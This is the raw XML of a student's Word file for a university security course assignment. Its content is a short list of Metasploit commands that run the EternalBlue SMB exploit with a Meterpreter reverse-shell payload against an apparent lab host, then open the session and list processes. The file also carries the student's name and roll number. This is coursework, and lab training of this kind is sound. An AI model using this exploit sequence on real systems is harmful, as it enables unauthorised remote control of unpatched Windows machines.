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84AF19" w14:textId="77777777" w:rsidR="006F092F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Name: Hadia Arshad                     Roll no. 251684551                                  date: 29 Nov,24      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753E483E" w14:textId="77777777" w:rsidR="006F092F" w:rsidRDefault="006F092F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="716668FB" w14:textId="77777777" w:rsidR="006F092F" w:rsidRDefault="006F092F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00D66C22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FF0D13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A558A3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463624" w14:textId="77777777" w:rsidR="006F092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9692EB7" wp14:editId="7331E324">
            <wp:extent cx="5943600" cy="1803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7BD27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402BE2" w14:textId="77777777" w:rsidR="006F092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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">  Assignment:1   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E01EBF" w14:textId="77777777" w:rsidR="006F092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                                                                  </w:t>
      </w:r>
      <w:hyperlink r:id="rId5">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
            <w:b/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:highlight w:val="white"/>
          </w:rPr>
          <w:t>COMP421B</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76084E37" w14:textId="77777777" w:rsidR="006F092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                                                Submitted to: Dr. Saad Bin Saleem </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AD831A" w14:textId="77777777" w:rsidR="006F092F" w:rsidRDefault="006F092F">
      <w:pPr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168B3E4F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E22993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61D42D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15B238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62C917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C93A6B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D2E427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87785F" w14:textId="77777777" w:rsidR="006F092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List of commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5721A3EF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9AF658" w14:textId="77777777" w:rsidR="006F092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1.msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E964BD" w14:textId="77777777" w:rsidR="006F092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2.use exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCA672C" w14:textId="77777777" w:rsidR="006F092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3.set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE4EBE3" w14:textId="754E2B9C" w:rsidR="006F092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4.set </w:t>
      </w:r>
      <w:r w:rsidR="0089469A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RHOSTS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10.10.31.109</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3A2254" w14:textId="18549C5E" w:rsidR="006F092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5.set </w:t>
      </w:r>
      <w:r w:rsidR="0089469A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LHOST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10.10.234.19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0443D992" w14:textId="77777777" w:rsidR="006F092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6.set lport 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FE5C7A" w14:textId="77777777" w:rsidR="006F092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7.exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2E9520" w14:textId="77777777" w:rsidR="006F092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8.sessions -i 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1BE08B" w14:textId="77777777" w:rsidR="006F092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9.ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2481E7F9" w14:textId="77777777" w:rsidR="006F092F" w:rsidRDefault="006F092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AD0D21" w14:textId="77777777" w:rsidR="006F092F" w:rsidRDefault="006F092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DD8460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2C4B76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57DFFD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389285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59FF90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AE0BE8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0B9FE4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01DB25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411B2B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BC1CDB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ABEE66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E5AE06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51F678" w14:textId="77777777" w:rsidR="006F092F" w:rsidRDefault="006F09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6F092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0483EF04-2E69-4955-8B95-928AD5201E12}"/>
    <w:embedBold r:id="rId2" w:fontKey="{A4C7CE72-8F24-4454-B7A5-986DA36B88B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CB9D528-D045-4D17-82C0-0574F26DC96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1BB910F-9041-43E1-BAB3-F2918EF56DA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92F"/>
    <w:rsid w:val="006F092F"/>
    <w:rsid w:val="0089469A"/>
    <w:rsid w:val="00BA6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9B4D1"/>
  <w15:docId w15:val="{918FC3A8-05A5-49CE-8477-B6071847B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://tmoodle.fccollege.edu.pk/course/view.php?id=16742" TargetMode="Externa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102</Words>
  <Characters>582</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>4</Lines>
  <Paragraphs>1</Paragraphs>
  <ScaleCrop>false</ScaleCrop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Hadia Arshad</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-30T18:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-30T18:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>